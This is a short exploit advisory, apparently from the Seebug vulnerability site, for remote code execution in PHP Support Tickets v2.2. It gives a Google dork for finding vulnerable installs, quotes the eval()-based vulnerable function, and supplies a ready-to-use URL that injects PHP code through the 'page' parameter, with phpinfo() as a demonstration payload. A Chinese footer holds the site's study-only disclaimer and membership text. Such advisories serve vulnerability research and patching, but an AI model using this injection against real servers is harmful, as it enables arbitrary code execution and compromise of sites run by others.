# Exploit Title: PHP Support Tickets v2.2 Code Exec # Google Dork: "PHP Support Tickets v2.2" # Date: 26.09.2010 # Author: brain[pillow] # Software Link: http://www.phpsupporttickets.com/ # Version: 2.2 ==================================================================== # Vuln. code: /classes/GUI/abstract.GUI.php public function getPageName() { return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';'); } ==================================================================== # Exploit: /index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论